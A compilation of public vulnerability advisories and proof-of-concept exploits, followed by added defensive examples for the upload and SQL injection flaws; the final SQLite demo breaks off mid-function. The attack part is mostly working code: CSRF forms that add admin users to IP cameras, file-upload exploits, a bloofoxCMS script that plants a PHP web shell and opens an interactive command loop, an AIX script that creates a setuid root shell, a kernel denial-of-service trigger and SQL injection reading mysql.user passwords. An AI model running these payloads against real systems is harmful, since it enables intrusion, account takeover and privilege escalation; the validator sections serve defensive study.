source: https://www.securityfocus.com/bid/60782/info
Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks.
http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png
source: https://www.securityfocus.com/bid/60760/info
FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FtpLocate 2.02 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>
source: https://www.securityfocus.com/bid/60690/info
The RokDownloads component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<?php
// Double extension: the name ends in .gif, but the PHP payload inside is what gets stored.
$uploadfile = "Amir.php.gif";
$ch = curl_init("http://www.example.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the old "@filename" form, which PHP 7+ no longer honours by default.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
source: https://www.securityfocus.com/bid/60682/info
TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability: its telnet configuration menu accepts an empty password.
Attackers can exploit this issue to bypass authentication and read device configuration, including the SNMP community strings, which may aid in further attacks. The script below logs in with a blank password and walks the menus to print the device name, node ID, manufacturer, model and community strings.
import sys
import telnetlib  # removed in Python 3.13; run this with 3.12 or earlier

host = sys.argv[1]
tn = telnetlib.Telnet(host)

# The configuration menu accepts an empty password: answer the prompt with a bare CR/LF.
tn.read_until(b"Password:")
tn.write(b"\r\n")

# Option 1, then option 1 in the submenu: device name and node ID.
tn.read_until(b"choice")
tn.write(b"1\r\n")
tn.read_until(b"choice")
tn.write(b"1\r\n")
data = tn.read_until(b"choice").decode("latin-1")
for line in data.split("\r\n"):
    if "Device Name" in line or "Node ID" in line:
        print(line.strip())

# Back (0), then option 2: manufacturer and model.
tn.write(b"0\r\n")
tn.read_until(b"choice")
tn.write(b"2\r\n")
data = tn.read_until(b"choice").decode("latin-1")
for line in data.split("\r\n"):
    if "Manufacture:" in line or "Model:" in line:
        print(line.strip())

# Back (0), then option 5: SNMP community strings.
tn.write(b"0\r\n")
tn.read_until(b"choice")
tn.write(b"5\r\n")
data = tn.read_until(b"choice").decode("latin-1")
for line in data.split("\r\n"):
    if "Community" in line:
        print(line.strip())
tn.close()
source: https://www.securityfocus.com/bid/60660/info
et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.
An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in arbitrary code execution within the context of the vulnerable application.
et-chat 3.07 is vulnerable; other versions may also be affected.
http://www.example.com/chat/?AdminRegUserEdit&admin&id=4
/*
source: https://www.securityfocus.com/bid/60586/info
The Linux Kernel is prone to a local denial-of-service vulnerability.
Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions.
*/
/*
** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
** Jonathan Salwan - 2013-06-05
*/
#include <errno.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <linux/types.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Local copy of the kernel's struct; only .group matters for the trigger. */
struct ext4_new_group_input {
    __u32 group;
    __u64 block_bitmap;
    __u64 inode_bitmap;
    __u64 inode_table;
    __u32 blocks_count;
    __u16 reserved_blocks;
    __u16 unused;
};

#define EXT4_IOC_GROUP_ADD _IOW('f', 8, struct ext4_new_group_input)

int main(int ac, const char *av[])
{
    struct ext4_new_group_input input;
    int fd;

    if (ac < 2) {
        printf("Syntax : %s <path on an ext4 filesystem>\n", av[0]);
        printf("Example : %s /tmp\n", av[0]);
        return -1;
    }
    /* The ioctl is issued on whatever descriptor open() returns for the given path. */
    printf("[+] Opening the ext4 device\n");
    if ((fd = open(av[1], O_RDONLY)) < 0) {
        perror("[-] open");
        return -1;
    }
    printf("[+] Trigger the infinite loop\n");
    memset(&input, 0, sizeof(input));
    input.group = -1;   /* group = 0xffffffff is the value that makes the kernel loop forever */
    if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0) {
        perror("[-] ioctl");
    }
    close(fd);
    return 0;
}
source: https://www.securityfocus.com/bid/60585/info
bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected.
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : Bloofox CMS Unrestricted File Upload Exploit
Date : 17 June 2013
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.bloofox.com/
Software Link : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
Version : 0.5.0
Tested on : Window and Linux
#####################################################
VULNERABILITY: Unrestricted File Upload
#####################################################
This application has an upload feature that allows an authenticated user
with the Administrator or Editor role to upload arbitrary files to the media
directory, giving remote code execution by simply requesting the uploaded file.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
if ($argc < 3)
{
print "\n==============================================\n";
print " Bloofox CMS Unrestricted File Upload Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n\n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n\n";
print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "username={$argv[3]}&password={$argv[4]}&action=login";
$packet = "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
$response = http_send($host, $packet);
if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
print "\n..:: Login Successful ::..\n";
print "\n..:: Waiting hell ::..\n\n";
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}media/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nBloofox-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
source: https://www.securityfocus.com/bid/60533/info
The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Sends a local file to the NextGEN Gallery upload handler under a .gif name.
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;
my $ua  = LWP::UserAgent->new();
my $req = POST $url,
    Content_Type => 'form-data',
    Content      => [
        name          => $name,
        galleryselect => 1,   # Gallery ID, should exist
        # local file, renamed to file.gif and declared as image/gif for the upload
        Filedata      => [ "$file", "file.gif", Content_Type => 'image/gif' ],
    ];
my $res = $ua->request($req);
if ($res->is_success) {
    print $res->content;
} else {
    print $res->status_line, "\n";
}
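The RokDownloads, bloofoxCMS and NextGEN Gallery entries above all come down to one mistake: the upload handler trusts the client's filename (Amir.php.gif, sh.php, file.gif with a PHP body) and writes it, as named, into a web-served directory. The validator below is an added example written for this page, not code from any of those projects. It assumes an image-only upload feature; the magic-byte table and the random storage name are the editor's choices.

```python
import os
import secrets

# Leading bytes for the image types the upload feature is meant to accept.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


def check_upload(filename: str, data: bytes) -> str:
    """Validate an image upload and return a server-generated storage name.

    Every check runs on the whole client-supplied name, not just its tail:
    - no directory components
    - exactly one extension, so Amir.php.gif and x.gif.php fail before any
      web-server double-extension handling can come into play
    - extension on an allow-list
    - content starts with the magic bytes for that extension
    - no PHP open tag anywhere in the body: a GIF89a header followed by <?php
      passes the magic check but still executes if it lands in a PHP-enabled dir
    The returned name is random; the client's name is never written to disk.
    """
    if os.path.basename(filename.replace("\\", "/")) != filename:
        raise ValueError(f"directory components in {filename!r}")
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise ValueError(f"expected exactly one extension in {filename!r}")
    ext = "." + parts[1]
    if ext not in MAGIC:
        raise ValueError(f"extension {ext} not allowed")
    if not data.startswith(MAGIC[ext]):
        raise ValueError(f"content does not look like {ext}")
    if b"<?php" in data or b"<?=" in data or b"<script" in data.lower():
        raise ValueError("executable content embedded in image")
    return secrets.token_hex(16) + ext


def verdict(filename: str, data: bytes) -> str:
    """Human-readable outcome, used to tabulate the page's payloads."""
    try:
        return "stored as " + check_upload(filename, data)
    except ValueError as e:
        return "rejected: " + str(e)


if __name__ == "__main__":
    # Constructed payloads modelled on the three exploits above.
    php = b"<?php error_reporting(0); passthru($_GET['c']); ?>"
    for name, body in [("Amir.php.gif", php),          # RokDownloads double extension
                       ("sh.php", php),                # bloofox: no extension check at all
                       ("file.gif", php),              # NextGEN: .gif name, PHP body
                       ("logo.gif", b"GIF89a" + php),  # polyglot: valid header, PHP tail
                       ("photo.gif", b"GIF89a" + bytes(16))]:
        print(f"{name:14} -> {verdict(name, body)}")
```

Even with these checks, keep the upload directory outside the document root or served with script execution disabled; content validation is the second line of defence, not the first.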
source: https://www.securityfocus.com/bid/60566/info
TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62%2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
source: https://www.securityfocus.com/bid/60569/info
The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass the plugin's access restrictions and reach protected resources, which may aid in launching further attacks. The PoC below requests a restricted path with a URL-encoded slash (%2f) prefixed to it.
http://www.example.com/%2ftest/
source: https://www.securityfocus.com/bid/60532/info
Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
source: https://www.securityfocus.com/bid/60529/info
Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
<input type="Select" name="ViewerModeDefault" value="00000fff">
<input type="Hidden" name="ViewerAuthen" value="off">
<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
<input type="Hidden" name="User1" value="xxxx,c0000fff">
<input type="Hidden" name="User2" value="xxxx,c0000fff">
<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
<input type="Hidden" name="User4" value="Og==,00000fff">
<input type="Hidden" name="User5" value="Og==,00000fff">
<input type="Hidden" name="User6" value="Og==,00000fff">
<input type="Hidden" name="User7" value="Og==,00000fff">
<input type="Hidden" name="User8" value="Og==,00000fff">
<input type="Hidden" name="User9" value="Og==,00000fff">
<input type="Hidden" name="Reload" value="referer">
<script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Code Execution & CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
The file editor provides the possibility to edit .tpl files stored in the
templates directory.
But the file editor is vulnerable to directory traversal when saving files, and
it does not check the submitted filename against a whitelist of allowed files.
It also does not check the file extension. Because of this, it is possible to
gain code execution.
Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.
3. Proof of Concept
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html
Source: https://code.google.com/p/google-security-research/issues/detail?id=483
Windows: NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege
Platform: Windows 8.1 Update, Windows 10, Windows Server 2012
Class: Local DoS/Elevation of Privilege
Summary:
The NtCreateLowBoxToken API allows the capture of arbitrary handles, which can lead to local DoS or elevation of privilege.
Description:
The NtCreateLowBoxToken system call accepts an array of handles which are stored with the new token. This is presumably for maintaining references to the appcontainer specific object directories and symbolic links so that they do not need to be maintained anywhere else. The function, SepReferenceLowBoxObjects which captures the handles has a couple of issues which can lead to abuse:
1) It calls ZwDuplicateObject which means the API can capture kernel handles as well as user handles.
2) No checks are made on what object types the handles represent.
The fact that kernel handles can be captured isn’t as bad as it could be. As far as I can tell there’s no way of getting the handles back. The second issue though is slightly more serious as it allows a user to create a reference cycle to kernel objects and potentially maintain them indefinitely, at least until a reboot.
One way of doing this is to exploit the fact that threads can be assigned impersonation tokens. For example a new thread can be created and the handle to that thread captured inside the lowbox handle table. The resulting lowbox token can then be assigned as an impersonation token, the thread and token now maintain their references and the kernel objects survive the user logging out. As the thread references the process this also maintains the process object.
Now at the point of logging out the process will be terminated but because the token maintains the reference cycle the process object itself will not go away. This can lead to a few results:
1) A user could open handles to important resources and files and prevent the handles getting released. This could ultimately result in a local DoS (although only something like a terminal server would be affected) and the administrator wouldn’t easily be able to fix it without rebooting as the process becomes hidden from typical task managers and trying to terminate it won’t help.
2) If a user logs out then back in again they can reopen the process (by PID or using NtGetNextProcess) and get access to the original process token which is still marked as having the original session ID (something which would normally require TCB privilege to change). This might be exploitable to elevate privileges in some scenarios.
While the session object still exists in the kernel due to the reference cycle, it is dead so trying to create a process within that session will not work, however the user could release the reference cycle by clearing the thread’s impersonation token which will let session object be cleaned up and allow another user (again think terminal server) to login with that session ID. The user could then create a process in that session indirectly by impersonating the token and using something like the task scheduler.
It isn’t immediately clear if the user would be able to access the session’s desktop/window station due to its DACL, but at the least references to the sessions object directory could be maintained (such as DosDevices) which might allow the user to redirect named resources for the user to themselves and get the privileges of the other user. This would be particularly serious if the other user was an administrator.
Proof of Concept:
I’ve provided a PoC which will cause the reference cycle and display the process if it can open one. The archive password is ‘password’. Follow these steps:
1) Extract the PoC to a location on a local hard disk which is writable by a normal user
2) Execute the poc executable file
3) The user should be automatically logged out
4) Log back in as the user
5) Execute poc again, it should now print out information about the stuck process and the extracted process token.
Expected Result:
It shouldn’t be possible to generate a kernel object reference cycle
Observed Result:
The reference cycle is created and the user can reopen the process.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38580.zip
Advisory ID: HTB23266
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication: July 1, 2015 [without technical details]
Vendor Notification: July 1, 2015
Vendor Patch: September 8, 2015
Public Disclosure: October 22, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors.
The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users’ cookies, spread malware to website visitors, and even obtain full control over vulnerable website.
A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor:
<form action = "http://[host]/admin/pages/maintenance" method = "POST">
<input type="hidden" name="form_name" value="maintenance">
<input type="hidden" name="maintenance_enable" value="on">
<input type="hidden" name="save" value="Save">
<input type="hidden" name="maintenance_text" value="<script>alert('ImmuniWeb');</script>">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Oxwall 1.8
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23266 - https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on Oxwall.
[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy to use PHP/MySQL social networking software platform.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
source: https://www.securityfocus.com/bid/60526/info
Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected.
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of
them does not require any credentials, and allows the direct extraction of data
from the database.
3. SQL Injection
Description
Pligg CMS is vulnerable to SQL injection. It is possible to extract data from
all databases that the pligg database user has access to.
Credentials are not required.
Proof Of Concept
http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23
Code
/story.php:168
if(isset($_GET['reply']) && !empty($parent_comment_id)){
$main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
$main_smarty->assign('parrent_comment_id',$parent_comment_id);
}
[...]
function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;
//Set comment order to 1 if it's not set in the admin panel
if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];
if (!isset($CommentOrder)) $CommentOrder = 1;
If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}
[...]
$comments = $db->get_results("SELECT *
FROM " . table_comments . "
WHERE (comment_status='published' $status_sql) AND
comment_link_id=$link->id AND comment_id = $comment_id
ORDER BY " . $CommentOrderBy);
4. Blind SQL Injection (Admin Area)
Description
There is a blind SQL injection in the admin area of Pligg CMS. It allows an
attacker who has obtained admin credentials to extract data from the database.
The problem exists because the index of the submitted "enabled" POST array is
used in a query. The value is escaped, so quotes cannot be used in the injection,
but it is not placed between quotes, so none are needed.
Proof Of Concept
POST /pligg-cms-master/admin/admin_users.php HTTP/1.1
frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1
Code
// admin/admin_users.php
foreach($_POST["enabled"] as $id => $valuea)
{
$_GET['id'] = $id = $db->escape($id);
$user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");
5. Possible SQL Injection
Description
The upload module is vulnerable to Blind SQL Injection via the "comment" as
well as "id" parameter.
The module seems to be unused at the moment, but if it were to be used in the
future, or if an attacker finds a different way to execute it, it would be
vulnerable.
The requests to trigger the vulnerabilities would be:
POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23
POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1<script' or 1%3D1%23></script>&number=1&comment=1
Code
./modules/upload/upload.php:
if ($_POST['id'])
{
$linkres=new Link;
$linkres->id = sanitize($_POST['id'], 3);
if(!is_numeric($linkres->id)) die("Wrong ID");
if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");
// Remove old file and thumbnails with same number
$sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";
The first problem is that $_POST[comment] is never sanitized.
The second problem is that $_POST['id'] is first sanitized by removing tags,
then the result is checked for being numeric, and finally the original POST
value is used in the query. Because of this, it is possible to put the injection
inside tags to bypass the check.
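The three Pligg findings above are three distinct ways a query ends up executing attacker text: an integer interpolated without quotes (story.php), a value that is quote-escaped but never placed inside quotes (admin_users.php), and a value that is sanitized in a copy while the original goes into the SQL (upload.php). The script below, an added example for this page rather than Pligg's code, reproduces each against an in-memory SQLite database with constructed tables and shows the bound-parameter form next to it. SQLite has no BENCHMARK() and uses -- rather than # for comments, so the blind probe is a boolean condition and the tag-bypass payload ends in --.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Pligg tables the page's queries touch."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE comments (comment_id INTEGER, comment_link_id INTEGER,
                               comment_status TEXT, comment_content TEXT);
        INSERT INTO comments VALUES (1, 1, 'published', 'first'), (2, 1, 'published', 'second');
        CREATE TABLE users (user_id INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password');
        CREATE TABLE files (file_link_id INTEGER, file_number INTEGER, file_comment_id INTEGER);
        INSERT INTO files VALUES (1, 1, 0), (2, 1, 0), (3, 1, 0);
    """)
    return db


# --- 3. story.php: integer interpolated without quotes -------------------------
def comments_vulnerable(db, link_id, comment_id):
    sql = ("SELECT * FROM comments WHERE comment_status='published' "
           f"AND comment_link_id={link_id} AND comment_id = {comment_id}")
    return db.execute(sql).fetchall()


def comments_fixed(db, link_id, comment_id):
    # Bound parameters travel as data: the UNION text is compared to comment_id, not parsed.
    sql = ("SELECT * FROM comments WHERE comment_status='published' "
           "AND comment_link_id=? AND comment_id=?")
    return db.execute(sql, (link_id, comment_id)).fetchall()


# --- 4. admin_users.php: escaped, but not quoted --------------------------------
def escape_quotes(s: str) -> str:
    """What $db->escape() buys you: backslash-escaped quotes and nothing else."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def user_vulnerable(db, raw_id: str):
    ident = escape_quotes(raw_id)           # payload contains no quotes, so this is a no-op
    return db.execute(f"SELECT * FROM users WHERE user_id={ident}").fetchall()


# --- 5. upload.php: sanitize a copy, then use the original ----------------------
TAG_RE = re.compile(r"<[^>]*>")


def files_vulnerable(db, raw_id: str):
    checked = TAG_RE.sub("", raw_id)        # sanitize($_POST['id'], 3) strips tags
    if not checked.isdigit():               # is_numeric() runs on the stripped copy
        raise ValueError("Wrong ID")
    sql = f"SELECT * FROM files WHERE file_link_id='{raw_id}'"  # ...but the original is queried
    return db.execute(sql).fetchall()


def files_fixed(db, raw_id: str):
    link_id = int(raw_id)                   # validate the value you are actually going to use
    return db.execute("SELECT * FROM files WHERE file_link_id=?", (link_id,)).fetchall()


def run_demo() -> dict:
    db = make_db()
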